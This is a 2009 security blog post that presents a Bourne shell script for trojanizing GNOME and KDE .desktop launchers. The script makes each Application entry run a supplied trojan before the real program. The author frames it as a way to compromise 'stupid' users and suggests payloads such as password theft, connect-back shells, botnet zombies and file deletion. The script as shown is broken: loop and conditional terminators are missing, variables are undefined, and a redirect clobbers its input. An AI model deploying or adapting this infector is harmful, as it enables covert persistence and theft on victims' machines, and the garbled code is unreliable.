xorl %eax, %eax

Trojanizing GNOME and KDE .desktop files

leave a comment »

This obviously isn’t a new concept. I’ve personally saw this kind of technique used a few times in the wild. Since I still don’t have any good suggestions to proceed with a vulnerability analysis I’ll just provide a retarded shell script I’ve written to trojanize .desktop files for KDE and GNOME (or any other window managers using them). According to the official specification, the format of a valid .desktop file is similar to:

[Desktop Entry]

Encoding=    ENCODING_CODE
Name=        ICON_NAME
Exec=        FILE_TO_EXECUTE
Icon=        ICON_FILE
Type=        MIME_TYPE

Assuming that we only care about the application icons the following script infects only the .desktop files with “Application” type set. However, you can easily change this to trojanize every desktop file. Anyway, Here is the script:


if [ $# -ne 1 ]; then
   echo "Usage: $0 <trojan>"
   exit 1
if [ ! -f $1 ]; then
   echo "Trojan file not found."
   exit 1
for i in `ls ~/Desktop/*.desktop`
   grep "Type=*Application*" $i > /dev/null &2>/dev/null
   if [ $RET -eq 0 ]; then
     echo "[*] Infecting $i"
     APP=`grep Exec $i | sed -e 's/=/ /g' | awk {'print $2'}`
     rm -r $NEWFILE
     echo "$1 &amp;" > $NEWFILE
     echo "$APP" >> $NEWFILE
     chmod +x $NEWFILE
     sed "s/Exec=$APP/Exec=\/tmp\/\'"$APP"'.2346/g" $i | sed "s/'//g" > $i
     echo "[*] Done"

Well, believe it or not this childish script can help you compromise some extremely stupid Linux/BSD/Whatever-uses-KDE-or-GNOME users. I found it useful to write a simple trojan code that just reports some system information as well as passwords (hopefully) but this infector can also be used for whatever you may want. Some random ideas: connect-back shells, further infection (like a virus or something), botnet zombies, rm’ng hosts etc. Finally just a heads-up on the script. This is just a crappy bourne shell script I’ve written as a PoC of my assumption. You can write completely automated tools that will use that .desktop infection technique. However, I personally found it childish and retarded.

Written by xorl

February 26, 2009 at 18:00

Posted in security, tips

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s